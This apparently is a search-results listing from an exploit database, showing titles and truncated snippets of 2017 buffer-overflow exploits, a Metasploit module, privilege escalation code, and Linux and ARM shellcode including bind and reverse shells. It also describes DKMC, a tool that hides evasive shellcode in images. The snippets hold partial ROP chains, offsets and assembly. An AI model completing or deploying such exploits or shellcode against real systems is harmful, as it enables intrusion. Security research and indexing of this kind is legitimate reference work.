5626 matches found
ASX to MP3 converter < 3.1.3.7 - '.asx' Local Stack Overflow (DEP Bypass)
import struct,sys head =''' REF HREF="mms://site.com/ach/music/smpl/LACA-05928-002-tes''' offset 17375 junk = "A" 17375 0x1003df8e 0x774e1035 EIP="\x36\x10\x4e\x77" adjust="A" 4 def createropchain: ropgadgets = 0x73dd5dce, POP EAX RETN MFC42.DLL 0x5d091368, ptr to &VirtualProtect IAT COMCTL32.dll...
Easy MPEGAVIDIVXWMVRM to DVD - Enter User Name Local Buffer Overflow (SEH)
Easy MPEGAVIDIVXWMVRM to DVD - Enter User Name Local Buffer Overflow SEH !/usr/bin/python Exploit Title: Easy MPEG/AVI/DIVX/WMV/RM to DVD - 'Enter User Name' Field Buffer Overflow SEH Date: 05-10-2017 Exploit Author: Venkat Rajgor Vendor Homepage: http://www.divxtodvd.net/ Software Link:...
Linux/x86_64 - mkdir() 'evil' Shellcode (30 bytes)
Linux/x86_64 - mkdir 'evil' Shellcode 30 bytes. Shellcode exploit for Linx86-64 platform / ;Title: Linux/x86_64 - mkdir shellcode 30 bytes ;Author: Touhid M.Shaikh ;Contact: https://github.com/touhidshaikh ;Category: Shellcode ;Architecture: Linux x86_64 ;Description: Create Folder with 755...
CyberLink LabelPrint < 2.5 - Buffer Overflow (SEH Unicode) Exploit
Exploit for windows platform in category local exploits !/usr/bin/python Exploit Title: CyberLink LabelPrint =2.5 File Project Processing Unicode Stack Overflow Date: September 23, 2017 Exploit Author: f3ci Vendor Homepage: https://www.cyberlink.com/ Software Link:...
Disk Pulse Enterprise 9.9.16 - GET Buffer Overflow (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Disk Pulse Enterprise GET Buffer Overflow', 'Description' = %q This module exploits an SEH buffer overflow in Disk Pulse Enterprise 9.9.16. If a...
VulnCheck KEV: CVE-2017-20201
CCleaner v5.33.6162 and CCleaner Cloud v1.07.3191 32-bit builds contained a malicious pre-entry-point loader that diverts execution from __scrt_common_main_seh into a custom loader. That loader decodes an embedded blob into shellcode, allocates executable heap memory, resolves Windows API...
Netdecision 5.8.2 - Local Privilege Escalation
// Netdecision.cpp : Defines the entry point for the console application. / Exploit Title: Netdecision 5.8.2 - Local Privilege Escalation - Winring0x32.sys Date: 2017.09.17 Exploit Author: Peter Baris Vendor Homepage: www.netmechanica.com Software Link: http://www.netmechanica.com/downloads/...
Netdecision 5.8.2 - Local Privilege Escalation
Netdecision 5.8.2 - Local Privilege Escalation // Netdecision.cpp : Defines the entry point for the console application. / Exploit Title: Netdecision 5.8.2 - Local Privilege Escalation - Winring0x32.sys Date: 2017.09.17 Exploit Author: Peter Baris Vendor Homepage: www.netmechanica.com Software...
Linux/ARM (Raspberry Pi) - Bind TCP Shell (4444/TCP) Shellcode (192 bytes)
/ Andrea Sindoni - @invictus1306 This shellcode is part of my episodes: - ARM exploitation for IoT - https://quequero.org/2017/07/arm-exploitation-iot-episode-2/ Environment: Raspberry pi 3 Default settings for port:4444 @.syntax unified .global start start: mov r1, 0x5C @ r1=0x5c mov r5, 0x11 @...
Linux/ARM (Raspberry Pi) - Reverse TCP Shell (192.168.0.12:4444/TCP) Shellcode (160 bytes)
/ Andrea Sindoni - @invictus1306 This shellcode is part of my episodes: - ARM exploitation for IoT - https://quequero.org/2017/07/arm-exploitation-iot-episode-2/ Environment: Raspberry pi 3 Default settings for port:4444 ip:192.168.0.12 .global start start: mov r1, 0x5C @ r1=0x5c mov r5, 0x11 @...
Linux/ARM (Raspberry Pi) - Bind TCP Shell (4444/TCP) Shellcode (192 bytes)
Linux/ARM Raspberry Pi - Bind TCP Shell 4444/TCP Shellcode 192 bytes. Shellcode exploit for ARM platform / Andrea Sindoni - @invictus1306 This shellcode is part of my episodes: - ARM exploitation for IoT - https://quequero.org/2017/07/arm-exploitation-iot-episode-2/ Environment: Raspberry pi 3...
DKMC - Malicious Payload Evasion Tool
Don't kill my cat is a tool that generates obfuscated shellcode that is stored inside of polyglot images. The image is 100% valid and also 100% valid shellcode. The idea is to avoid sandbox analysis since it's a simple "legit" image. For now the tool relies on PowerShell to execute the final...
Jungo DriverWizard WinDriver Overflow
-- coding: utf-8 -- """ Jungo DriverWizard WinDriver Kernel Pool Overflow Vulnerability Download: http://www.jungo.com/st/products/windriver/ File: WD1240.EXE Sha1: 3527cc974ec885166f0d96f6aedc8e542bb66cba Driver: windrvr1240.sys Sha1: 0f212075d86ef7e859c1941f8e5b9e7a6f2558ad CVE: CVE-2017-14153...
Linux/x86 - Fork Bomb Shellcode (9 bytes)
/ ;Title: Linux/x86 - Fork Bomb Shellcode ; Author: Touhid M.Shaikh ; Contact: https://github.com/touhidshaikh ; Category: Shellcode ; Architecture: Linux x86 ; Description: This shellcode may crash ur system if executed in ur sys. Length: 9 bytes ===COMPILATION AND EXECUTION=== nasm -f elf32...
Linux/x86 - Fork Bomb Shellcode (9 bytes)
Linux/x86 - Fork Bomb Shellcode 9 bytes. Shellcode exploit for Linx86 platform / ;Title: Linux/x86 - Fork Bomb Shellcode ; Author: Touhid M.Shaikh ; Contact: https://github.com/touhidshaikh ; Category: Shellcode ; Architecture: Linux x86 ; Description: This shellcode may crash ur system if execut...
Easy DVD Creator 2.5.11 - Buffer Overflow (SEH) Exploit
Exploit for windows platform in category local exploits !/usr/bin/python Exploit Title: Easy DVD Creator 2.5.11 - Buffer Overflow Windows 10 64bit, SEH Date: 26-08-2017 Exploit Author: tr0ubl3m4k3r Vulnerable Software: Easy DVD Creator Vendor Homepage: http://www.divxtodvd.net/ Version: 2.5.11...
Easy DVD Creator 2.5.11 Buffer Overflow
!/usr/bin/python Exploit Title: Easy DVD Creator 2.5.11 - Buffer Overflow Windows 10 64bit, SEH Date: 26-08-2017 Exploit Author: tr0ubl3m4k3r Vulnerable Software: Easy DVD Creator Vendor Homepage: http://www.divxtodvd.net/ Version: 2.5.11 Software Link: http://www.divxtodvd.net/easydvdcreator.exe...
Easy DVD Creator 2.5.11 - Local Buffer Overflow (SEH)
Easy DVD Creator 2.5.11 - Local Buffer Overflow SEH !/usr/bin/python Exploit Title: Easy DVD Creator 2.5.11 - Buffer Overflow Windows 10 64bit, SEH Date: 26-08-2017 Exploit Author: tr0ubl3m4k3r Vulnerable Software: Easy DVD Creator Vendor Homepage: http://www.divxtodvd.net/ Version: 2.5.11 Softwa...
Easy DVD Creator 2.5.11 - Local Buffer Overflow (SEH)
!/usr/bin/python Exploit Title: Easy DVD Creator 2.5.11 - Buffer Overflow Windows 10 64bit, SEH Date: 26-08-2017 Exploit Author: tr0ubl3m4k3r Vulnerable Software: Easy DVD Creator Vendor Homepage: http://www.divxtodvd.net/ Version: 2.5.11 Software Link: http://www.divxtodvd.net/easydvdcreator.exe...
Disk Pulse Enterprise 10.0.12 Buffer Overflow
!/usr/bin/python Exploit Title : Disk Pulse Enterprise v10.0.12 - Buffer Overflow Discovery by : Anurag Srivastava Email : [email protected] Website : www.pyramidcyber.com Discovery Date : 25/08/2017 Software Link : http://www.diskpulse.com/setups/diskpulseentsetupv10.0.12.exe...